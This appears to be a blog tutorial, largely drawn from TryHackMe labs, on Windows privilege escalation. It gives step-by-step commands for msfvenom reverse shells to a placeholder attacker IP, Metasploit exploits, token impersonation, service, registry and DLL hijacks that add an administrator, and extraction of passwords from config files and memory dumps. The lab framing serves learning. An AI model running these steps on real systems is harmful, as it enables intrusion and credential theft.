Windows Privilege escalation

By /

Table of Contents

1. Initial Enumeration.

1.1 System Enumeration

  • systeminfo
    systeminfo | findstr /B /C: "os name" /C: "os version" /C: "system type"
  • hostname
  • wmic qfe
    wmic = windows management instrumentation command line
    qfe = quick fix engineer
  • wmic logicaldisk
    wmic logicaldisk get caption,description,providername

1.2 User enumeration

  • whoami /priv
    To know what privileges we have
  • whoami /groups
    To know what groups the user is in
  • net user
    This will show us the users on that machine
  • net user user1
    For more information of that user1
  • net local group user1

1.3 Network enumeration

  • ipconfig
    ipconfig /all
  • arp -a
    arp tables
  • route print
  • netstat -ano
    who are we communicating etc..,

1.4 Password Hunting

  • Some SAML files stores hash’s of passwords in the system
  • unattend.xml might also store passwords.
  • findstr /si password *.txt *.ini *.config
    password is a string here, it can be replaced by anything.
  • findstr /spin "password" *.
    finds all passwords in all files

1.5 Firewall & antivirus

  • sc query windefend
    sc = service control
    windefend checks whether defender is present or not.
It is working
  • sc queryex type= service
    shows all the services running in the system
  • netsh advfirewall firewall dump
  • netsh firewall show state
  • netsh firewall show config
    shows the configuration of the firewall.

2. Kernel Exploits.

  • A Kernel is the core component of the operating system, and it acts as a bridge between the hardware components and software applications.
  • When an operating system is loaded into memory, the kernel loads first and remains in memory until the operating system is shut down again.
  • The kernel is responsible for low-level tasks such as disk management, task management and memory management.

Initially these exploits are facilitated once we get a foothold on our target system, so after we get some access through metasploit(preferably) run this /post/multi/recon/local_exploit_suggester and check if Kitrap0d exists.

2.1 Kitrap0d Exploit

  • we will initially create a reverse shell and upload it into the target system msfvenom -p windows/shell_reverse_tcp LHOST=yourIP LPORT=555 -f aspx > myfile.aspx
    -p = payload(here a simple reverse shell)
    LHOST = present system IP address
    LPORT = Port of your choice
    -f = file type (Which file type the system is going to work on)
    > = save the output file with a file name
  • someway upload this file into the target system. Here, we use ftp as an example to upload ftp 10.0.0.1
    password is anonymous and then type "put manual.aspx
  • nc -nvlp 555
  • Go to the IP Address/site and invoke the payload.

From Tryhackme

Establish a shell

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe
7. Copy the generated file, shell.exe, to the Windows VM.

Windows VM

1. Execute shell.exe and obtain reverse shell

Detection & Exploitation

Kali VM

1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
5. In Metasploit (msf > prompt) type: set LPORT 5555
6. In Metasploit (msf > prompt) type: run

NOTE: The shell might default to your eth0 during this attack.  If so, ensure you type set lhost [Kali VM IP Address] and run again.

2.2 Potato Attacks

suppose we have a shell into the Windows machine and after checking for whoami /priv we found out that we have impersonation token privileges.

Which helps us to get NT/Authority by a potato attack, then the following ca be done:

there will be two instances by this point

  1. first instance is we must have a foot hold into the system and check if the system has any seImpersonatePrivilege(above figure)
  2. Is the Metasploit shell which we are about to plot.

IN METASPLOIT:

  • use /exploit/multi/script/web_delivery
  • set the target as PSH(PowerShell)
  • set the payload as windows/meterpreter/reverse_tcp
  • set LHOST and SRVHOST as your IP address.
  • Enter run, we will get a Payload, copy it and paste it in the first instance where the initial foothold shell is present(1.)
Paste the above command in the first instance
  • After pasting, enter session1 and type getprivs
  • check if it’s x64 or x86 architecture by typing getuid
  • Run the post/multi/recon/local_exploit_suggester and check all the available exploits that can be leveraged.
  • run windows/local/ms16_075_reflection
  • set session to 1
  • set LHOST to the ip of kali
  • set LPORT to any port that the session 1 is not listening on
  • set payload to windows/x64/meterpreter/reverse_tcp
  • run
  • load incognito
  • type list_tokens -u and observe for NT AUTHORITY\SYSTEM
  • type impersonate_token "NT Authority\SYSTEM"
  • type shellnow we are as Authority
  • In case of Labs and boxes there might be some data streams situation which uses to hide the information of a file in that cases we can use this blog:https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
  • simple one-liners could be dir /R (For recursive searching of files with in the dir) more < file name want to be searched

From Tryhackme

Potato Escalation – Hot Potato

Exploitation

Windows VM

1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command “net localgroup administrators user /add”
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

3. Escalation Types.

3.1 Registry Escalation — Autorun

when we plug in an external disk or any other input to the system, windows will say to what would you want me to do with this device? We say to run it, now it auto run’s it.

We are searching for something that runs automatically and if it has the right privileges to give us an elevated shell.

Install Autorun.exe in your Lab environment and then do the following

  • Open command prompt and type:
  • C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
  • In Autoruns, click on the ‘Logon’ tab.
  • From the listed results, notice that the “My Program”(can be anything based on the target system) entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
  • In command prompt type:
    C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”
    -w = only show me items that have write access
    -v = show me as much detail that u can provide for me
    -u = ignore the errors
  • From the output, notice that the “Everyone”(Can be anything based on the target system) user group has “FILE_ALL_ACCESS” and Read and Write permission on the “program.exe” file.
  • So we can create a malicious program.exe file that can give us a reverse shell, and we can control the whole Windows system.

EXPLOITATION(in Linux system)

  1. Open command prompt and type: msfconsole
  2. In Metasploit (msf > prompt) type: use multi/handler
  3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  5. In Metasploit (msf > prompt) type: run
  6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
  7. Copy the generated file, program.exe, to the Windows VM. u can do this by hosting a python server in Kali and download that from the Windows system

Windows VM(Lab environment/Target system)

  1. Place program.exe(metasploit acquired program.exe) in ‘C:\Program Files\Autorun Program’.
  2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

Linux system

  1. Wait for a new session to open in Metasploit.
  2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
  3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Tryhackme

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
2. In Autoruns, click on the ‘Logon’ tab.
3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”
5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
7. Copy the generated file, program.exe, to the Windows VM.

Windows VM

1. Place program.exe in ‘C:\Program Files\Autorun Program’.
2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

Kali VM

1. Wait for a new session to open in Metasploit.
2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

3.2 Registry Escalation — AlwaysInstallElevated

  • Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that “AlwaysInstallElevated” value is 1. So the registry is set to allow “AlwaysInstallElevated”.
  • In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that “AlwaysInstallElevated” value is 1. So the registry is set to allow “AlwaysInstallElevated”.
  • lets go to Linux and run metasploit.

IN LINUX(METASPLOIT)

  1. Open command prompt and type: msfconsole
  2. In Metasploit (msf > prompt) type: use multi/handler
  3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  5. In Metasploit (msf > prompt) type: run
  6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  7. Copy the generated file, setup.msi, to the Windows VM.
  8. Install the .msi file in windows and observe a reverse shell popping out in the Linux machine.

3.3 Service Escalation — Registry(regsvc ACL)

  • we are going to check services (mainly regsvc(registry service)) , and see if we have full control on the registry key
  • once we find the service, we will compile an executable that is written in ‘c’ and tell it to run some malicious code like adding a user to the administrator group, etc…,
  • Open powershell(type powershell -ep bypass) prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
    Get -Acl is a built-in tool which gets Access control list of the following hklm registry
  • Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.
  • We can create a malicious service and embed

In WINDOWS MACHINE

  • Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the linux VM.
    Inorder to do the following in Linux open a python php server python -m pyftlib -p21 — write
    In windows open the folder path where the file is present and open the cmd , type ftp kaliIP then give username and password as anonymous.
    Type put windows_service.c

In Linux machine

  • Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
Replace in system() function.
  • Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use ‘sudo apt install gcc-mingw-w64’)
  • copy the generated x.exe file into the windows by normal Python HTTP server.

IN WINDOWS MACHINE

  • place x.exe in ‘C:/Temp’
  • Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
    –     we are adding a registry HKLM and /v stands for what value name is to be added to the reg key and, the value name is ImagePath.
    – the imagepath is a reg key that has the path of the drivers image file so if we place the executable here and tell the service to start, the imagefile is going to run the service(x.exe) for us
    – REG_EXPAND_SZ says we are running a string value and the string value is /d c:\temp\x.exe (/d = data) /f no prompt
  • In the command prompt, type: sc start regsvc.
  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Tryhackme

Detection

Windows VM

1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.

Exploitation

Windows VM

1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM.

Kali VM

1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use ‘sudo apt install gcc-mingw-w64’) 
3. Copy the generated file x.exe, to the Windows VM.

Windows VM

1. Place x.exe in ‘C:\Temp’.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

3.4 Service Escalation — Executable Files

  • we are looking for services running, that have executables attached to them or executable files as a service.
  • And if they have read and write permission or FILE_ALL_ACCESS to them, then it is possible to leverage an attack and gain elevated privileges.

Method 1

  • Navigate to powerup tool and open a CMD in it.
  • type powershell -ep bypass
  • type . .\powerUp.ps1
  • type Invoke-AllChecks
  • we can observe the filepermsvc service running and is modifiable by everyone.

Method 2:

  • Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\File Permissions Service”
  • Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.

So in Method2 we have to know the service file path where to search the executable might be there, this can be quite difficult in a real world situation.

In method 1 it is quite easy because the script is giving all the information that we need to gain the elevated shell……

EXPLOITATION

  • Use the same x.exe(from 3.3 Service Escalation — Registry(regsvc ACL)) and save it in the program files >file permission service > rename it to with filepermservice.exe to x.exe
  • (OR) u can just copy the old x.exe file from older location to newer location by doing the following copy /y C:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
Replacing filepermservice.exe with x.exe
  • check the net localgroup administrator
  • start the service sc start filepermservice and check the net localgroup administrator
  • A new user will be added to the administrator group.

TRYHACKME

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\File Permissions Service”
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.

Exploitation

Windows VM

1. Open command prompt and type: copy /y c:\Temp\x.exe “c:\Program Files\File Permissions Service\filepermservice.exe”
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

3.5 privilege Escalation — Startup Applications

  • when ever we boot into our device, certain application have to be running automatically to maintain the system even before we operate it. These certain applications are known as startup applications.
  • We are going to create a malicious startup application that grants us the elevated access and runs at the time of startup.
  • In order to do that we are going to use icacls.exe this is a ACL tool used to check the permissions of the ACL’s and allow us to see where we have the access.
  • what is an ACL?
    In computer security, an access-control list (ACL) is a list of permissions associated with a system resource (object). An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects.

IN WINDOWS MACHINE

  • Open command prompt and type:
    icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
  • From the output, notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

LINUX MACHINE

  • Open command prompt and type:msfconsole
  • In Metasploit (msf > prompt) type:use multi/handler
  • . In Metasploit (msf > prompt) type:set payload windows/meterpreter/reverse_tcp
  • In Metasploit (msf > prompt) type:set lhost [Kali VM IP Address]
  • In Metasploit (msf > prompt) type:run
  • Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o y.exe
  • Copy the generated file, x.exe, to the Windows VM.

WINDOWS MACHINE

  • Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
  • Logoff. and Login with admin credentials.

LINUX MACHINE

  • Wait for a session to be created, it may take a few seconds
  • In Meterpreter(meterpreter > prompt) type: getuid
  • From the output, notice the user is “User-PC\Admin”

TryHackme

Detection

Windows VM

1. Open command prompt and type: icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Login with the administrator account credentials.

Kali VM

1. Wait for a session to be created, it may take a few seconds.
2. In Meterpreter(meterpreter > prompt) type: getuid
3. From the output, notice the user is “User-PC\Admin”

3.6 Service Escalation — DLL Hijacking

  • What does DLL mean?
    – DLL files, or Dynamic Link Library files, contain the resources an application needs to run successfully. These could include images and a library of executable functions.
    – DLL files cannot be opened by end-users, they can only be opened by their associated application, which usually happens when the application starts up.
  • What is DLL Hijacking?
    – DLL hijacking is a method of injecting malicious code into an application by exploiting the way some Windows applications search and load Dynamic Link Libraries (DLL).
    – Only Microsoft operating systems are susceptible to DLL hijacks.
    – By replacing a required DLL file with an infected version and placing it within the search parameters of an application, the infected file will be called upon when the application loads, activating its malicious operations.

IN WINDOWS MACHINE

  • Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
  • In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time(For reaserch purpose). Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.
  • In procmon, select “filter”. From the left-most drop down menu, select ‘Path’ and ‘ends with’
  • In the input box on the same line type: .dll
  • Make sure the line reads path ends with .dll then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
  • Next, select from the left-most drop down menu ‘Result’.
  • In the input box on the same line type: NAME NOT FOUND
  • Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’
  • Open command prompt and type: sc start dllsvc
  • Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location

IN WINDOWS MACHINE

  • Copy ‘C:\Users\User\Desktop\Tools\Source\windows_dll.c’ to the Kali VM.
  • Can do the above by opening a ftp server in kali and in windows connect to that ftp server by typing ftp <kali ip> and write put “file name”

IN LINUX MACHINE

  • Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
  • Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
  • Copy the generated file hijackme.dll, to the Windows VM. ( do this by spawning a python server in kali and downloading that file in windows by going to the ip address in internet)

IN WINDOWS MACHINE

  • Place hijackme.dll in ‘C:\Temp’.
  • Open command prompt and type: sc stop dllsvc & sc start dllsvc
  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
A new “user” has been added into the administrator group

TryHackMe

Detection

Windows VM

1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
2. In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time. Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.
3. In procmon, select “filter”.  From the left-most drop down menu, select ‘Process Name’.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
6. Next, select from the left-most drop down menu ‘Result’.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.

Exploitation

Windows VM

1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_dll.c’ to the Kali VM.

Kali VM

1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. Copy the generated file hijackme.dll, to the Windows VM.

Windows VM

1. Place hijackme.dll in ‘C:\Temp’.
2. Open command prompt and type: sc stop dllsvc & sc start dllsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

3.7 Service Escalation — binPath

Method 1

  • Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
    -w = show me items that have write access
    -u = supress errors
    -v = verbos
    -c = display service names
  • Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Method 2

  • Navigate to powerup tool and open a CMD in it.
  • type powershell -ep bypass
  • type . .\powerUp.ps1
  • type Invoke-AllChecks
  • observe “Cheking service permissions”
  • In the o/p we can see that daclsvc has the restart permission so we can keep some malicious file in to it an can restart the file and gain the elevated privilages
  • We will gather more information on the daclsvc by typing accesschk64.exe -wvuc daclsvc
  • we can see a RW permission for EVERYONE to SERVICE_CHANGE_CONFIG in all the acquired three outputs from different enumerating ways.
  • so lets see query the service by typing sc qc daclsvc
  • we can see a binary path in the output and we have the access to config the service so if we combine both of them , we can give our malicious code in the Binary path and make it execute.
  • In command prompt type: sc config daclsvc binpath= “net localgroup administrators user /add”
  • In command prompt type: sc start daclsvc
  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

TryHackMe

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Exploitation

Windows VM

1. In command prompt type: sc config daclsvc binpath= “net localgroup administrators user /add”
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

3.8 Service Escalation — Unquoted Service Paths

  • if u have a service executable that its path is not enclosed in a quataton(“”) marks and having space between them , then we have a Service Escalation — Unquoted Service Paths
  • Example consider going to the following directory in regedit Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\sevices\unquotedsvc
  • in the above service, observe the Image Path, there are no quotes around it and spaces are present. so now windows is going to interpretate each individual word as a program(.exe,.pdf,.ing) or as files. for ex: it will go in the order of Program , program.exe, program.pdf, program files.exe, ……. and will settle into “program files”
  • so we can create a malicious common.exe file and trick the system to run it while its searching for the path in the image path attribute.

IN LINUX MACHINE

  • Open command prompt and type:msfconsole
  • In Metasploit (msf > prompt) type:use multi/handler
  • In Metasploit (msf > prompt) type:set payload windows/meterpreter/reverse_tcp
  • In Metasploit (msf > prompt) type:set lhost [Kali VM IP Address]
  • In Metasploit (msf > prompt) type:run
  • Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o common.exe
  • (OR) msfvenom -p windows/exec CMD=’net localgroup administrators user /add’ -f exe-service -o common.exe (By doing this we have to open netcat session like nc — nvlp 444 and get a shell)
  • . Copy the generated file, x.exe, to the Windows VM. Do the above 7. by spawning a python server in kali and downloading it through the windows by typing kali ip’

IN WINDOWS MACHINE

  • . Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
  • Open command prompt and type: sc start unquotedsvc
  • Open the metasploit tab and see for a meterpreter shell.

TryHackMe

Detection

Windows VM

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD=’net localgroup administrators user /add’ -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

4. Password Mining Escalation

4.1 Password Mining Escalation – Configuration Files

Exploitation

Windows VM

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the “<Password>” property and copy the base64 string that is confined between the “<Value>” tags underneath it.

Kali VM

1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password

4.2. Password Mining Escalation – Memory

Exploitation

Kali VM

1.Open command prompt and type: msfconsole
2.In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3.In Metasploit (msf > prompt) type: set uripath x
4.In Metasploit (msf > prompt) type: run

Windows VM

1.Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2.Open command prompt and type: taskmgr
3.In Windows Task Manager, right-click on the “iexplore.exe” in the “Image Name” columnand select “Create Dump File” from the popup menu.
4.Copy the generated file, iexplore.DMP, to the Kali VM.

Kali VM

1.Place ‘iexplore.DMP’ on the desktop.
2.Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep “Authorization: Basic”
3.Select the Copy the Base64 encoded string.
4.In command prompt type: echo -ne [Base64 String] | base64 -d
5.Notice the credentials in the output.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top